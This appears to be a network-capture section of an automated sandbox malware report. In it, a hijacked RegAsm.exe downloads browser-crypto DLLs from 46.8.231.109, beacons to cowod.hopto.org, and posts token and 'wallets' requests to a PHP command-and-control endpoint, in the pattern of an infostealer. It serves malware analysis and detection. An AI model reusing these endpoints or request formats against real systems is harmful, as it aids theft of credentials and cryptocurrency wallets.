00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 2, 2024 09:42:27.010945082 CEST	91	OUT	GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:42:27.190498114 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49811	45.132.206.251	80	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:22.787323952 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 5785 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:42:22.787323952 CEST	5785	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------FIECBFIDGDAKFH
Oct 2, 2024 09:42:23.650891066 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 02 Oct 2024 07:42:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49819	46.8.231.109	80	6212	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:27.208375931 CEST	92	OUT	GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:42:27.813750982 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 2, 2024 09:42:27.813813925 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a2 00 10 a0 a2 00 10 80 a2 00 10 e0 a2 00 10 90 a3 00 10 30 a3 00 10 10 a3 00 10 70 a3 00 10 30 a4 00 10 d0 a3 Data Ascii: 0p0pP0`P` @
Oct 2, 2024 09:42:27.813846111 CEST	1236	IN	Data Raw: 20 ac 00 10 e0 ab 00 10 10 ad 00 10 50 ad 00 10 30 ad 00 10 00 ad 00 10 10 ae 00 10 10 a5 00 10 20 a5 00 10 00 00 00 00 00 00 00 00 00 00 03 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 a2 00 00 00 a0 a2 00 00 00 e0 a2 00 00 Data Ascii: P0 0p0Pp 0P``
Oct 2, 2024 09:42:27.813899994 CEST	224	IN	Data Raw: 00 02 50 3b 01 00 02 60 3b 01 00 02 70 3b 01 00 02 80 3b 01 00 02 90 3b 01 00 02 a0 3b 01 00 02 b0 3b 01 00 02 c0 3b 01 00 02 d0 3b 01 00 02 e0 3b 01 00 00 10 3c 01 00 00 30 3c 01 00 00 60 3c 01 00 02 a0 3c 01 00 02 e0 3c 01 00 02 20 3d 01 00 02 Data Ascii: P;`;p;;;;;;;;<0<`<<< ===0>p>0??@@AAA`BB@CPCpCCCCPD`DpDDDDDEE E
Oct 2, 2024 09:42:27.813931942 CEST	1236	IN	Data Raw: 01 00 00 b0 45 01 00 02 e0 45 01 00 02 30 46 01 00 00 40 46 01 00 02 70 46 01 00 02 a0 46 01 00 02 e0 46 01 00 02 80 47 01 00 00 a0 47 01 00 00 20 48 01 00 02 40 48 01 00 02 b0 48 01 00 02 e0 48 01 00 02 50 49 01 00 00 70 49 01 00 02 a0 49 01 00 Data Ascii: EE0F@FpFFFGG H@HHHPIpIIIJJKPKpKK`L M@MPM`MpMMMM0NPPQQQQ`RRSSSSSTTpT
Oct 2, 2024 09:42:27.813967943 CEST	1236	IN	Data Raw: 00 00 e0 b7 01 00 00 b0 b8 01 00 00 b0 ba 01 00 00 d0 ba 01 00 00 40 bb 01 00 00 b0 bb 01 00 00 d0 bc 01 00 00 f0 bd 01 00 00 50 be 01 00 00 c0 be 01 00 00 30 bf 01 00 00 a0 c0 01 00 00 b0 c0 01 00 00 00 c1 01 00 02 90 c2 01 00 02 d0 c2 01 00 02 Data Ascii: @P00 P P @p`@P`p0
Oct 2, 2024 09:42:27.814002991 CEST	448	IN	Data Raw: 00 70 a9 02 00 00 10 aa 02 00 00 b0 aa 02 00 00 e0 aa 02 00 00 f0 aa 02 00 00 10 ab 02 00 00 30 ab 02 00 00 40 ab 02 00 00 50 ab 02 00 00 70 ab 02 00 00 90 ab 02 00 00 d0 ac 02 00 00 40 ae 02 00 00 80 af 02 00 00 f0 b0 02 00 00 60 b1 02 00 00 d0 Data Ascii: p0@Pp@`pP0@ pPP0 @
Oct 2, 2024 09:42:27.814131975 CEST	1236	IN	Data Raw: 02 00 00 50 fb 02 00 00 d0 fb 02 00 00 40 fc 02 00 02 70 fc 02 00 00 a0 fc 02 00 00 e0 fc 02 00 00 20 fd 02 00 00 60 fd 02 00 00 a0 fd 02 00 00 00 fe 02 00 00 f0 fe 02 00 02 10 ff 02 00 02 30 ff 02 00 02 50 ff 02 00 02 70 ff 02 00 02 90 ff 02 00 Data Ascii: P@p `0PpP@p @0p`.../@/p//`0
Oct 2, 2024 09:42:27.814224005 CEST	1236	IN	Data Raw: 00 02 e0 93 03 00 02 20 94 03 00 02 60 94 03 00 02 a0 94 03 00 02 e0 94 03 00 02 20 95 03 00 02 60 97 03 00 02 d0 99 03 00 02 40 9c 03 00 02 70 9c 03 00 02 e0 9d 03 00 02 10 9e 03 00 02 90 9f 03 00 02 c0 9f 03 00 02 40 a1 03 00 02 60 a1 03 00 02 Data Ascii: ` `@p@`@PP`pP@0 PPP
Oct 2, 2024 09:42:27.814258099 CEST	448	IN	Data Raw: 00 00 00 00 00 00 00 a0 1a bd 2a 3f 00 00 00 e0 3a 0f 81 3f 00 00 00 40 5b 55 c5 3f 00 00 00 80 99 99 b9 3f 00 00 00 90 99 99 39 3e 00 00 00 30 33 33 a3 3c 00 00 00 90 99 99 f9 3a 7a 2a da 21 fb 04 45 40 75 cb 78 32 2d b8 c3 40 ee fd a1 11 b3 56 Data Ascii: ?:?@[U??9>033<:z!E@ux2-@VA?WI@_X-}@V$A@.?y>@+eG?z*!E@WI@ux2-@@_X-}@VAV$Aa<Rj=2KF={4gEZ
Oct 2, 2024 09:42:27.819011927 CEST	1236	IN	Data Raw: 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 00 00 00 00 00 00 41 29 21 1c 19 17 16 15 14 13 12 12 11 11 11 10 10 10 0f 0f 0f 0f 0e 0e 0e 0e 0e 0e 0e 0d 0d 0d 0d 0d 0d 00 00 00 30 31 32 33 34 35 Data Ascii: 456789abcdefghijklmnopqrstuvwxyzA)!0123456789abcdefABCDEF0123456789abcdefABCDEFxUnknown exceptionxbad
Oct 2, 2024 09:42:28.886130095 CEST	88	OUT	GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:42:29.059647083 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49821	46.8.231.109	80	6212	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:29.100893974 CEST	92	OUT	GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:42:29.711116076 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 2, 2024 09:42:29.711174011 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 8c 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 Data Ascii: Ut]h6h{t]UtH]h6h{t1]Ut$]h6h{t]Ut
Oct 2, 2024 09:42:29.711210012 CEST	1236	IN	Data Raw: c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cf cc cc cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0c 8b 48 68 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 04 31 c0 5d c3 a1 0c 9a 03 10 eb d2 cc cc cc cc Data Ascii: t]UtHh]h6h{t1]UtHl]h6h{t]UtHp]h6h{t]UtHt]h6h
Oct 2, 2024 09:42:29.711244106 CEST	1236	IN	Data Raw: 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 a4 00 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 04 31 c0 5d c3 a1 0c 9a 03 10 eb cf cc cc cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 b8 00 00 00 Data Ascii: Ut]h6h{t1]Ut]h6h{t1]Ut]h6h{t]Ut]h6h{t]
Oct 2, 2024 09:42:29.711280107 CEST	896	IN	Data Raw: 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 1c 01 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff Data Ascii: ]h6h{t]Ut]h6h{t]Utl]h6h{t]Utp]h6h{t]U
Oct 2, 2024 09:42:29.711313009 CEST	1236	IN	Data Raw: ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 58 01 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 04 31 c0 5d c3 a1 0c 9a 03 10 eb cf cc cc cc 55 89 e5 a1 0c 9a Data Ascii: ]UtX]h6h{t1]Ut\]h6h{t]Ut`]h6h{t]Utd]h6h
Oct 2, 2024 09:42:29.711365938 CEST	1236	IN	Data Raw: 85 c0 74 0f 8b 88 c8 01 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 d0 01 00 00 ff 15 00 a0 03 10 5d ff Data Ascii: t]h6h{t]Ut]h6h{t]Ut]h6h{t]Ut]h6h{t]
Oct 2, 2024 09:42:29.711416960 CEST	448	IN	Data Raw: a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 b4 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 Data Ascii: 6h{t]Ut]h6h{t]Ut]h6h{t]Ut]h6h{t]Ut
Oct 2, 2024 09:42:29.711452007 CEST	1236	IN	Data Raw: a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 02 5d c3 a1 0c 9a 03 10 eb d1 cc cc cc cc cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 cc 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 Data Ascii: 6h{t]Ut]h6h{t]Ut]h6h{t]Ut]h6h{t1]Ut
Oct 2, 2024 09:42:29.711481094 CEST	224	IN	Data Raw: 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 38 03 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 Data Ascii: t]Ut8]h6h{t]Ut<]h6h{t]Ut@]h6h{t]UtD
Oct 2, 2024 09:42:29.716363907 CEST	1236	IN	Data Raw: 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 90 03 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 Data Ascii: ]h6h{t]Ut]h6h{t]UtH]h6h{t]UtL]h6h{t1]U
Oct 2, 2024 09:42:30.212367058 CEST	96	OUT	GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:42:30.387546062 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 2, 2024 09:42:30.873155117 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKFBAFIDAEBFHJKJEBF Host: 46.8.231.109 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:42:31.092398882 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:31.652093887 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="message"wallets------KFHJJJKKFHIDAAKFBFBF--
Oct 2, 2024 09:42:31.839051962 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:31 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: 